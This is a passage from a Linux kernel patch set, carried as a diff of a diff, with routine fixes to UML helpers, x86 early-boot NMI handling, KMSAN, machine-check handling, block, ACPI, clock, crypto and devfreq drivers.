+-	stack = alloc_stack(0, __cant_sleep());
++	stack = alloc_stack(0, __uml_cant_sleep());
+ 	if (stack == 0)
+ 		return -ENOMEM;
+ 
+@@ -70,7 +70,7 @@ int run_helper(void (*pre_exec)(void *), void *pre_data, char **argv)
+ 	data.pre_data = pre_data;
+ 	data.argv = argv;
+ 	data.fd = fds[1];
+-	data.buf = __cant_sleep() ? uml_kmalloc(PATH_MAX, UM_GFP_ATOMIC) :
++	data.buf = __uml_cant_sleep() ? uml_kmalloc(PATH_MAX, UM_GFP_ATOMIC) :
+ 					uml_kmalloc(PATH_MAX, UM_GFP_KERNEL);
+ 	pid = clone(helper_child, (void *) sp, CLONE_VM, &data);
+ 	if (pid < 0) {
+@@ -121,7 +121,7 @@ int run_helper_thread(int (*proc)(void *), void *arg, unsigned int flags,
+ 	unsigned long stack, sp;
+ 	int pid, status, err;
+ 
+-	stack = alloc_stack(0, __cant_sleep());
++	stack = alloc_stack(0, __uml_cant_sleep());
+ 	if (stack == 0)
+ 		return -ENOMEM;
+ 
+diff --git a/arch/um/os-Linux/util.c b/arch/um/os-Linux/util.c
+index fc0f2a9dee5af..1dca4ffbd572f 100644
+--- a/arch/um/os-Linux/util.c
++++ b/arch/um/os-Linux/util.c
+@@ -173,23 +173,38 @@ __uml_setup("quiet", quiet_cmd_param,
+ "quiet\n"
+ "    Turns off information messages during boot.\n\n");
+ 
++/*
++ * The os_info/os_warn functions will be called by helper threads. These
++ * have a very limited stack size and using the libc formatting functions
++ * may overflow the stack.
++ * So pull in the kernel vscnprintf and use that instead with a fixed
++ * on-stack buffer.
++ */
++int vscnprintf(char *buf, size_t size, const char *fmt, va_list args);
++
+ void os_info(const char *fmt, ...)
+ {
++	char buf[256];
+ 	va_list list;
++	int len;
+ 
+ 	if (quiet_info)
+ 		return;
+ 
+ 	va_start(list, fmt);
+-	vfprintf(stderr, fmt, list);
++	len = vscnprintf(buf, sizeof(buf), fmt, list);
++	fwrite(buf, len, 1, stderr);
+ 	va_end(list);
+ }
+ 
+ void os_warn(const char *fmt, ...)
+ {
++	char buf[256];
+ 	va_list list;
++	int len;
+ 
+ 	va_start(list, fmt);
+-	vfprintf(stderr, fmt, list);
++	len = vscnprintf(buf, sizeof(buf), fmt, list);
++	fwrite(buf, len, 1, stderr);
+ 	va_end(list);
+ }
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index b4155273df891..d34222816c9f5 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -393,3 +393,8 @@ void do_boot_page_fault(struct pt_regs *regs, unsigned long error_code)
+ 	 */
+ 	kernel_add_identity_map(address, end);
+ }
++
++void do_boot_nmi_trap(struct pt_regs *regs, unsigned long error_code)
++{
++	/* Empty handler to ignore NMI during early boot */
++}
+diff --git a/arch/x86/boot/compressed/idt_64.c b/arch/x86/boot/compressed/idt_64.c
+index 3cdf94b414567..d100284bbef47 100644
+--- a/arch/x86/boot/compressed/idt_64.c
++++ b/arch/x86/boot/compressed/idt_64.c
+@@ -61,6 +61,7 @@ void load_stage2_idt(void)
+ 	boot_idt_desc.address = (unsigned long)boot_idt;
+ 
+ 	set_idt_entry(X86_TRAP_PF, boot_page_fault);
++	set_idt_entry(X86_TRAP_NMI, boot_nmi_trap);
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	/*
+diff --git a/arch/x86/boot/compressed/idt_handlers_64.S b/arch/x86/boot/compressed/idt_handlers_64.S
+index 22890e199f5b4..4d03c8562f637 100644
+--- a/arch/x86/boot/compressed/idt_handlers_64.S
++++ b/arch/x86/boot/compressed/idt_handlers_64.S
+@@ -70,6 +70,7 @@ SYM_FUNC_END(\name)
+ 	.code64
+ 
+ EXCEPTION_HANDLER	boot_page_fault do_boot_page_fault error_code=1
++EXCEPTION_HANDLER	boot_nmi_trap do_boot_nmi_trap error_code=0
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ EXCEPTION_HANDLER	boot_stage1_vc do_vc_no_ghcb		error_code=1
+diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h
+index 20118fb7c53bb..a49d9219c06e5 100644
+--- a/arch/x86/boot/compressed/misc.h
++++ b/arch/x86/boot/compressed/misc.h
+@@ -190,6 +190,7 @@ static inline void cleanup_exception_handling(void) { }
+ 
+ /* IDT Entry Points */
+ void boot_page_fault(void);
++void boot_nmi_trap(void);
+ void boot_stage1_vc(void);
+ void boot_stage2_vc(void);
+ 
+diff --git a/arch/x86/include/asm/irq_work.h b/arch/x86/include/asm/irq_work.h
+index 800ffce0db29e..6b4d36c951655 100644
+--- a/arch/x86/include/asm/irq_work.h
++++ b/arch/x86/include/asm/irq_work.h
+@@ -9,7 +9,6 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return boot_cpu_has(X86_FEATURE_APIC);
+ }
+-extern void arch_irq_work_raise(void);
+ #else
+ static inline bool arch_irq_work_has_interrupt(void)
+ {
+diff --git a/arch/x86/include/asm/kmsan.h b/arch/x86/include/asm/kmsan.h
+index 8fa6ac0e2d766..d91b37f5b4bb4 100644
+--- a/arch/x86/include/asm/kmsan.h
++++ b/arch/x86/include/asm/kmsan.h
+@@ -64,6 +64,7 @@ static inline bool kmsan_virt_addr_valid(void *addr)
+ {
+ 	unsigned long x = (unsigned long)addr;
+ 	unsigned long y = x - __START_KERNEL_map;
++	bool ret;
+ 
+ 	/* use the carry flag to determine if x was < __START_KERNEL_map */
+ 	if (unlikely(x > y)) {
+@@ -79,7 +80,21 @@ static inline bool kmsan_virt_addr_valid(void *addr)
+ 			return false;
+ 	}
+ 
+-	return pfn_valid(x >> PAGE_SHIFT);
++	/*
++	 * pfn_valid() relies on RCU, and may call into the scheduler on exiting
++	 * the critical section. However, this would result in recursion with
++	 * KMSAN. Therefore, disable preemption here, and re-enable preemption
++	 * below while suppressing reschedules to avoid recursion.
++	 *
++	 * Note, this sacrifices occasionally breaking scheduling guarantees.
++	 * Although, a kernel compiled with KMSAN has already given up on any
++	 * performance guarantees due to being heavily instrumented.
++	 */
++	preempt_disable();
++	ret = pfn_valid(x >> PAGE_SHIFT);
++	preempt_enable_no_resched();
++
++	return ret;
+ }
+ 
+ #endif /* !MODULE */
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index f1a748da5fabb..cad6ea1911e9b 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -44,6 +44,7 @@
+ #include <linux/sync_core.h>
+ #include <linux/task_work.h>
+ #include <linux/hardirq.h>
++#include <linux/kexec.h>
+ 
+ #include <asm/intel-family.h>
+ #include <asm/processor.h>
+@@ -239,6 +240,7 @@ static noinstr void mce_panic(const char *msg, struct mce *final, char *exp)
+ 	struct llist_node *pending;
+ 	struct mce_evt_llist *l;
+ 	int apei_err = 0;
++	struct page *p;
+ 
+ 	/*
+ 	 * Allow instrumentation around external facilities usage. Not that it
+@@ -292,6 +294,20 @@ static noinstr void mce_panic(const char *msg, struct mce *final, char *exp)
+ 	if (!fake_panic) {
+ 		if (panic_timeout == 0)
+ 			panic_timeout = mca_cfg.panic_timeout;
++
++		/*
++		 * Kdump skips the poisoned page in order to avoid
++		 * touching the error bits again. Poison the page even
++		 * if the error is fatal and the machine is about to
++		 * panic.
++		 */
++		if (kexec_crash_loaded()) {
++			if (final && (final->status & MCI_STATUS_ADDRV)) {
++				p = pfn_to_online_page(final->addr >> PAGE_SHIFT);
++				if (p)
++					SetPageHWPoison(p);
++			}
++		}
+ 		panic(msg);
+ 	} else
+ 		pr_emerg(HW_ERR "Fake kernel panic: %s\n", msg);
+diff --git a/block/bio.c b/block/bio.c
+index 6c22dd7b6f278..74c2818c7ec99 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -927,7 +927,7 @@ static bool bio_try_merge_hw_seg(struct request_queue *q, struct bio *bio,
+ 
+ 	if ((addr1 | mask) != (addr2 | mask))
+ 		return false;
+-	if (bv->bv_len + len > queue_max_segment_size(q))
++	if (len > queue_max_segment_size(q) - bv->bv_len)
+ 		return false;
+ 	return __bio_try_merge_page(bio, page, len, offset, same_page);
+ }
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index b3f99dda45300..c07e5eebcbd85 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1859,6 +1859,22 @@ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 	wait->flags &= ~WQ_FLAG_EXCLUSIVE;
+ 	__add_wait_queue(wq, wait);
+ 
++	/*
++	 * Add one explicit barrier since blk_mq_get_driver_tag() may
++	 * not imply barrier in case of failure.
++	 *
++	 * Order adding us to wait queue and allocating driver tag.
++	 *
++	 * The pair is the one implied in sbitmap_queue_wake_up() which
++	 * orders clearing sbitmap tag bits and waitqueue_active() in
++	 * __sbitmap_queue_wake_up(), since waitqueue_active() is lockless
++	 *
++	 * Otherwise, re-order of adding wait queue and getting driver tag
++	 * may cause __sbitmap_queue_wake_up() to wake up nothing because
++	 * the waitqueue_active() may not observe us in wait queue.
++	 */
++	smp_mb();
++
+ 	/*
+ 	 * It's possible that a tag was freed in the window between the
+ 	 * allocation failure and adding the hardware queue to the wait
+diff --git a/drivers/acpi/acpi_extlog.c b/drivers/acpi/acpi_extlog.c
+index 088db2356998f..0a84d5afd37c1 100644
+--- a/drivers/acpi/acpi_extlog.c
++++ b/drivers/acpi/acpi_extlog.c
+@@ -308,9 +308,10 @@ err:
+ static void __exit extlog_exit(void)
+ {
+ 	mce_unregister_decode_chain(&extlog_mce_dec);
+-	((struct extlog_l1_head *)extlog_l1_addr)->flags &= ~FLAG_OS_OPTIN;
+-	if (extlog_l1_addr)
++	if (extlog_l1_addr) {
++		((struct extlog_l1_head *)extlog_l1_addr)->flags &= ~FLAG_OS_OPTIN;
+ 		acpi_os_unmap_iomem(extlog_l1_addr, l1_size);
++	}
+ 	if (elog_addr)
+ 		acpi_os_unmap_iomem(elog_addr, elog_size);
+ 	release_mem_region(elog_base, elog_size);
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index f7852fb75ab39..756ab8edde83f 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -513,6 +513,15 @@ static const struct dmi_system_id video_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 3350"),
+ 		},
+ 	},
++	{
++	 .callback = video_set_report_key_events,
++	 .driver_data = (void *)((uintptr_t)REPORT_BRIGHTNESS_KEY_EVENTS),
++	 .ident = "COLORFUL X15 AT 23",
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "COLORFUL"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "X15 AT 23"),
++		},
++	},
+ 	/*
+ 	 * Some machines change the brightness themselves when a brightness
+ 	 * hotkey gets pressed, despite us telling them not to. In this case
+diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c
+index 9952f3a792bad..dd808cf65c841 100644
+--- a/drivers/acpi/apei/ghes.c
++++ b/drivers/acpi/apei/ghes.c
+@@ -99,6 +99,20 @@ static inline bool is_hest_type_generic_v2(struct ghes *ghes)
+ 	return ghes->generic->header.type == ACPI_HEST_TYPE_GENERIC_ERROR_V2;
+ }
+ 
++/*
++ * A platform may describe one error source for the handling of synchronous
++ * errors (e.g. MCE or SEA), or for handling asynchronous errors (e.g. SCI
++ * or External Interrupt). On x86, the HEST notifications are always
++ * asynchronous, so only SEA on ARM is delivered as a synchronous
++ * notification.
++ */
++static inline bool is_hest_sync_notify(struct ghes *ghes)
++{
++	u8 notify_type = ghes->generic->notify.type;
++
++	return notify_type == ACPI_HEST_NOTIFY_SEA;
++}
++
+ /*
+  * This driver isn't really modular, however for the time being,
+  * continuing to use module_param is the easiest way to remain
+@@ -461,7 +475,7 @@ static bool ghes_do_memory_failure(u64 physical_addr, int flags)
+ }
+ 
+ static bool ghes_handle_memory_failure(struct acpi_hest_generic_data *gdata,
+-				       int sev)
++				       int sev, bool sync)
+ {
+ 	int flags = -1;
+ 	int sec_sev = ghes_severity(gdata->error_severity);
+@@ -475,7 +489,7 @@ static bool ghes_handle_memory_failure(struct acpi_hest_generic_data *gdata,
+ 	    (gdata->flags & CPER_SEC_ERROR_THRESHOLD_EXCEEDED))
+ 		flags = MF_SOFT_OFFLINE;
+ 	if (sev == GHES_SEV_RECOVERABLE && sec_sev == GHES_SEV_RECOVERABLE)
+-		flags = 0;
++		flags = sync ? MF_ACTION_REQUIRED : 0;
+ 
+ 	if (flags != -1)
+ 		return ghes_do_memory_failure(mem_err->physical_addr, flags);
+@@ -483,9 +497,11 @@ static bool ghes_handle_memory_failure(struct acpi_hest_generic_data *gdata,
+ 	return false;
+ }
+ 
+-static bool ghes_handle_arm_hw_error(struct acpi_hest_generic_data *gdata, int sev)
++static bool ghes_handle_arm_hw_error(struct acpi_hest_generic_data *gdata,
++				       int sev, bool sync)
+ {
+ 	struct cper_sec_proc_arm *err = acpi_hest_get_payload(gdata);
++	int flags = sync ? MF_ACTION_REQUIRED : 0;
+ 	bool queued = false;
+ 	int sec_sev, i;
+ 	char *p;
+@@ -510,7 +526,7 @@ static bool ghes_handle_arm_hw_error(struct acpi_hest_generic_data *gdata, int s
+ 		 * and don't filter out 'corrected' error here.
+ 		 */
+ 		if (is_cache && has_pa) {
+-			queued = ghes_do_memory_failure(err_info->physical_fault_addr, 0);
++			queued = ghes_do_memory_failure(err_info->physical_fault_addr, flags);
+ 			p += err_info->length;
+ 			continue;
+ 		}
+@@ -631,6 +647,7 @@ static bool ghes_do_proc(struct ghes *ghes,
+ 	const guid_t *fru_id = &guid_null;
+ 	char *fru_text = "";
+ 	bool queued = false;
++	bool sync = is_hest_sync_notify(ghes);
+ 
+ 	sev = ghes_severity(estatus->error_severity);
+ 	apei_estatus_for_each_section(estatus, gdata) {
+@@ -648,13 +665,13 @@ static bool ghes_do_proc(struct ghes *ghes,
+ 			ghes_edac_report_mem_error(sev, mem_err);
+ 
+ 			arch_apei_report_mem_error(sev, mem_err);
+-			queued = ghes_handle_memory_failure(gdata, sev);
++			queued = ghes_handle_memory_failure(gdata, sev, sync);
+ 		}
+ 		else if (guid_equal(sec_type, &CPER_SEC_PCIE)) {
+ 			ghes_handle_aer(gdata);
+ 		}
+ 		else if (guid_equal(sec_type, &CPER_SEC_PROC_ARM)) {
+-			queued = ghes_handle_arm_hw_error(gdata, sev);
++			queued = ghes_handle_arm_hw_error(gdata, sev, sync);
+ 		} else {
+ 			void *err = acpi_hest_get_payload(gdata);
+ 
+diff --git a/drivers/acpi/numa/srat.c b/drivers/acpi/numa/srat.c
+index 12f330b0eac01..b57de78fbf14f 100644
+--- a/drivers/acpi/numa/srat.c
++++ b/drivers/acpi/numa/srat.c
+@@ -183,7 +183,7 @@ static int __init slit_valid(struct acpi_table_slit *slit)
+ 	int i, j;
+ 	int d = slit->locality_count;
+ 	for (i = 0; i < d; i++) {
+-		for (j = 0; j < d; j++)  {
++		for (j = 0; j < d; j++) {
+ 			u8 val = slit->entry[d*i + j];
+ 			if (i == j) {
+ 				if (val != LOCAL_DISTANCE)
+@@ -532,7 +532,7 @@ int __init acpi_numa_init(void)
+ 	 */
+ 
+ 	/* fake_pxm is the next unused PXM value after SRAT parsing */
+-	for (i = 0, fake_pxm = -1; i < MAX_NUMNODES - 1; i++) {
++	for (i = 0, fake_pxm = -1; i < MAX_NUMNODES; i++) {
+ 		if (node_to_pxm_map[i] > fake_pxm)
+ 			fake_pxm = node_to_pxm_map[i];
+ 	}
+diff --git a/drivers/base/arch_numa.c b/drivers/base/arch_numa.c
+index eaa31e567d1ec..5b59d133b6af4 100644
+--- a/drivers/base/arch_numa.c
++++ b/drivers/base/arch_numa.c
+@@ -144,7 +144,7 @@ void __init early_map_cpu_to_node(unsigned int cpu, int nid)
+ unsigned long __per_cpu_offset[NR_CPUS] __read_mostly;
+ EXPORT_SYMBOL(__per_cpu_offset);
+ 
+-static int __init early_cpu_to_node(int cpu)
++int __init early_cpu_to_node(int cpu)
+ {
+ 	return cpu_to_node_map[cpu];
+ }
+diff --git a/drivers/block/rnbd/rnbd-srv.c b/drivers/block/rnbd/rnbd-srv.c
+index 2cfed2e58d646..ad451224e6634 100644
+--- a/drivers/block/rnbd/rnbd-srv.c
++++ b/drivers/block/rnbd/rnbd-srv.c
+@@ -587,6 +587,7 @@ static char *rnbd_srv_get_full_path(struct rnbd_srv_session *srv_sess,
+ {
+ 	char *full_path;
+ 	char *a, *b;
++	int len;
+ 
+ 	full_path = kmalloc(PATH_MAX, GFP_KERNEL);
+ 	if (!full_path)
+@@ -598,19 +599,19 @@ static char *rnbd_srv_get_full_path(struct rnbd_srv_session *srv_sess,
+ 	 */
+ 	a = strnstr(dev_search_path, "%SESSNAME%", sizeof(dev_search_path));
+ 	if (a) {
+-		int len = a - dev_search_path;
++		len = a - dev_search_path;
+ 
+ 		len = snprintf(full_path, PATH_MAX, "%.*s/%s/%s", len,
+ 			       dev_search_path, srv_sess->sessname, dev_name);
+-		if (len >= PATH_MAX) {
+-			pr_err("Too long path: %s, %s, %s\n",
+-			       dev_search_path, srv_sess->sessname, dev_name);
+-			kfree(full_path);
+-			return ERR_PTR(-EINVAL);
+-		}
+ 	} else {
+-		snprintf(full_path, PATH_MAX, "%s/%s",
+-			 dev_search_path, dev_name);
++		len = snprintf(full_path, PATH_MAX, "%s/%s",
++			       dev_search_path, dev_name);
++	}
++	if (len >= PATH_MAX) {
++		pr_err("Too long path: %s, %s, %s\n",
++		       dev_search_path, srv_sess->sessname, dev_name);
++		kfree(full_path);
++		return ERR_PTR(-EINVAL);
+ 	}
+ 
+ 	/* eliminitate duplicated slashes */
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 45dffd2cbc719..76ceb8a0183d1 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1861,6 +1861,7 @@ static const struct qca_device_data qca_soc_data_wcn3998 = {
+ static const struct qca_device_data qca_soc_data_qca6390 = {
+ 	.soc_type = QCA_QCA6390,
+ 	.num_vregs = 0,
++	.capabilities = QCA_CAP_WIDEBAND_SPEECH | QCA_CAP_VALID_LE_STATES,
+ };
+ 
+ static const struct qca_device_data qca_soc_data_wcn6750 = {
+diff --git a/drivers/clk/hisilicon/clk-hi3620.c b/drivers/clk/hisilicon/clk-hi3620.c
+index a3d04c7c3da87..eb9c139babc33 100644
+--- a/drivers/clk/hisilicon/clk-hi3620.c
++++ b/drivers/clk/hisilicon/clk-hi3620.c
+@@ -467,8 +467,10 @@ static void __init hi3620_mmc_clk_init(struct device_node *node)
+ 		return;
+ 
+ 	clk_data->clks = kcalloc(num, sizeof(*clk_data->clks), GFP_KERNEL);
+-	if (!clk_data->clks)
++	if (!clk_data->clks) {
++		kfree(clk_data);
+ 		return;
++	}
+ 
+ 	for (i = 0; i < num; i++) {
+ 		struct hisi_mmc_clock *mmc_clk = &hi3620_mmc_clks[i];
+diff --git a/drivers/clk/imx/clk-imx8qxp.c b/drivers/clk/imx/clk-imx8qxp.c
+index 273de1f293076..1066ea16de625 100644
+--- a/drivers/clk/imx/clk-imx8qxp.c
++++ b/drivers/clk/imx/clk-imx8qxp.c
+@@ -67,6 +67,22 @@ static const char * const lcd_pxl_sels[] = {
+ 	"lcd_pxl_bypass_div_clk",
+ };
+ 
++static const char *const lvds0_sels[] = {
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"mipi0_lvds_bypass_clk",
++};
++
++static const char *const lvds1_sels[] = {
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"clk_dummy",
++	"mipi1_lvds_bypass_clk",
++};
++
+ static const char * const mipi_sels[] = {
+ 	"clk_dummy",
+ 	"clk_dummy",
+@@ -201,9 +217,9 @@ static int imx8qxp_clk_probe(struct platform_device *pdev)
+ 	/* MIPI-LVDS SS */
+ 	imx_clk_scu("mipi0_bypass_clk", IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_BYPASS);
+ 	imx_clk_scu("mipi0_pixel_clk", IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_PER);
+-	imx_clk_scu("mipi0_lvds_pixel_clk", IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC2);
+ 	imx_clk_scu("mipi0_lvds_bypass_clk", IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_BYPASS);
+-	imx_clk_scu("mipi0_lvds_phy_clk", IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC3);
++	imx_clk_scu2("mipi0_lvds_pixel_clk", lvds0_sels, ARRAY_SIZE(lvds0_sels), IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC2);
++	imx_clk_scu2("mipi0_lvds_phy_clk", lvds0_sels, ARRAY_SIZE(lvds0_sels), IMX_SC_R_LVDS_0, IMX_SC_PM_CLK_MISC3);
+ 	imx_clk_scu2("mipi0_dsi_tx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_MST_BUS);
+ 	imx_clk_scu2("mipi0_dsi_rx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_SLV_BUS);
+ 	imx_clk_scu2("mipi0_dsi_phy_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_0, IMX_SC_PM_CLK_PHY);
+@@ -213,9 +229,9 @@ static int imx8qxp_clk_probe(struct platform_device *pdev)
+ 
+ 	imx_clk_scu("mipi1_bypass_clk", IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_BYPASS);
+ 	imx_clk_scu("mipi1_pixel_clk", IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_PER);
+-	imx_clk_scu("mipi1_lvds_pixel_clk", IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC2);
+ 	imx_clk_scu("mipi1_lvds_bypass_clk", IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_BYPASS);
+-	imx_clk_scu("mipi1_lvds_phy_clk", IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC3);
++	imx_clk_scu2("mipi1_lvds_pixel_clk", lvds1_sels, ARRAY_SIZE(lvds1_sels), IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC2);
++	imx_clk_scu2("mipi1_lvds_phy_clk", lvds1_sels, ARRAY_SIZE(lvds1_sels), IMX_SC_R_LVDS_1, IMX_SC_PM_CLK_MISC3);
+ 
+ 	imx_clk_scu2("mipi1_dsi_tx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_MST_BUS);
+ 	imx_clk_scu2("mipi1_dsi_rx_esc_clk", mipi_sels, ARRAY_SIZE(mipi_sels), IMX_SC_R_MIPI_1, IMX_SC_PM_CLK_SLV_BUS);
+diff --git a/drivers/clk/mmp/clk-of-pxa168.c b/drivers/clk/mmp/clk-of-pxa168.c
+index 130d1a7238797..cb0ebbd820389 100644
+--- a/drivers/clk/mmp/clk-of-pxa168.c
++++ b/drivers/clk/mmp/clk-of-pxa168.c
+@@ -306,18 +306,21 @@ static void __init pxa168_clk_init(struct device_node *np)
+ 	pxa_unit->mpmu_base = of_iomap(np, 0);
+ 	if (!pxa_unit->mpmu_base) {
+ 		pr_err("failed to map mpmu registers\n");
++		kfree(pxa_unit);
+ 		return;
+ 	}
+ 
+ 	pxa_unit->apmu_base = of_iomap(np, 1);
+ 	if (!pxa_unit->apmu_base) {
+ 		pr_err("failed to map apmu registers\n");
++		kfree(pxa_unit);
+ 		return;
+ 	}
+ 
+ 	pxa_unit->apbc_base = of_iomap(np, 2);
+ 	if (!pxa_unit->apbc_base) {
+ 		pr_err("failed to map apbc registers\n");
++		kfree(pxa_unit);
+ 		return;
+ 	}
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+index 71e5f79431afa..6e4a78e1f3ced 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+@@ -419,8 +419,8 @@ int otx2_cptlf_init(struct otx2_cptlfs_info *lfs, u8 eng_grp_mask, int pri,
+ 	return 0;
+ 
+ free_iq:
+-	otx2_cpt_free_instruction_queues(lfs);
+ 	cptlf_hw_cleanup(lfs);
++	otx2_cpt_free_instruction_queues(lfs);
+ detach_rsrcs:
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
+ clear_lfs_num:
+@@ -431,11 +431,13 @@ EXPORT_SYMBOL_NS_GPL(otx2_cptlf_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ {
+-	lfs->lfs_num = 0;
+ 	/* Cleanup LFs hardware side */
+ 	cptlf_hw_cleanup(lfs);
++	/* Free instruction queues */
++	otx2_cpt_free_instruction_queues(lfs);
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
++	lfs->lfs_num = 0;
+ }
+ EXPORT_SYMBOL_NS_GPL(otx2_cptlf_shutdown, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+index 392e9fee05e81..6f3373f9928c2 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+@@ -249,8 +249,11 @@ static void cptvf_lf_shutdown(struct otx2_cptlfs_info *lfs)
+ 	otx2_cptlf_unregister_interrupts(lfs);
+ 	/* Cleanup LFs software side */
+ 	lf_sw_cleanup(lfs);
++	/* Free instruction queues */
++	otx2_cpt_free_instruction_queues(lfs);
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
++	lfs->lfs_num = 0;
+ }
+ 
+ static int cptvf_lf_init(struct otx2_cptvf_dev *cptvf)
+diff --git a/drivers/crypto/stm32/stm32-crc32.c b/drivers/crypto/stm32/stm32-crc32.c
+index 90a920e7f6642..c439be1650c84 100644
+--- a/drivers/crypto/stm32/stm32-crc32.c
++++ b/drivers/crypto/stm32/stm32-crc32.c
+@@ -104,7 +104,7 @@ static struct stm32_crc *stm32_crc_get_next_crc(void)
+ 	struct stm32_crc *crc;
+ 
+ 	spin_lock_bh(&crc_list.lock);
+-	crc = list_first_entry(&crc_list.dev_list, struct stm32_crc, list);
++	crc = list_first_entry_or_null(&crc_list.dev_list, struct stm32_crc, list);
+ 	if (crc)
+ 		list_move_tail(&crc->list, &crc_list.dev_list);
+ 	spin_unlock_bh(&crc_list.lock);
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index 2951a87ccb979..344e276165e41 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -461,10 +461,14 @@ static void devfreq_monitor(struct work_struct *work)
+ 	if (err)
+ 		dev_err(&devfreq->dev, "dvfs failed with (%d) error\n", err);
+ 
++	if (devfreq->stop_polling)
++		goto out;
++
+ 	queue_delayed_work(devfreq_wq, &devfreq->work,
+ 				msecs_to_jiffies(devfreq->profile->polling_ms));
+-	mutex_unlock(&devfreq->lock);
+ 
++out:
++	mutex_unlock(&devfreq->lock);
+ 	trace_devfreq_monitor(devfreq);
+ }
+ 
+@@ -482,6 +486,10 @@ void devfreq_monitor_start(struct devfreq *devfreq)
+ 	if (IS_SUPPORTED_FLAG(devfreq->governor->flags, IRQ_DRIVEN))
+ 		return;
+ 
++	mutex_lock(&devfreq->lock);
++	if (delayed_work_pending(&devfreq->work))
++		goto out;
++
+ 	switch (devfreq->profile->timer) {
+ 	case DEVFREQ_TIMER_DEFERRABLE:
+ 		INIT_DEFERRABLE_WORK(&devfreq->work, devfreq_monitor);
+@@ -490,12 +498,16 @@ void devfreq_monitor_start(struct devfreq *devfreq)
+ 		INIT_DELAYED_WORK(&devfreq->work, devfreq_monitor);
+ 		break;
+ 	default:
+-		return;
++		goto out;
+ 	}
+ 
+ 	if (devfreq->profile->polling_ms)
+ 		queue_delayed_work(devfreq_wq, &devfreq->work,
+ 			msecs_to_jiffies(devfreq->profile->polling_ms));
++
++out:
++	devfreq->stop_polling = false;
++	mutex_unlock(&devfreq->lock);
+ }
+ EXPORT_SYMBOL(devfreq_monitor_start);
+ 
+@@ -512,6 +524,14 @@ void devfreq_monitor_stop(struct devfreq *devfreq)
+ 	if (IS_SUPPORTED_FLAG(devfreq->governor->flags, IRQ_DRIVEN))
+ 		return;
+ 
++	mutex_lock(&devfreq->lock);
++	if (devfreq->stop_polling) {
++		mutex_unlock(&devfreq->lock);
++		return;
++	}
++
++	devfreq->stop_polling = true;
++	mutex_unlock(&devfreq->lock);
+ 	cancel_delayed_work_sync(&devfreq->work);
+ }
+ EXPORT_SYMBOL(devfreq_monitor_stop);
+diff --git a/drivers/gpu/drm/amd/amdgpu/aldebaran.c b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+index 2b97b8a96fb49..fa6193535d485 100644
+--- a/drivers/gpu/drm/amd/amdgpu/aldebaran.c
++++ b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
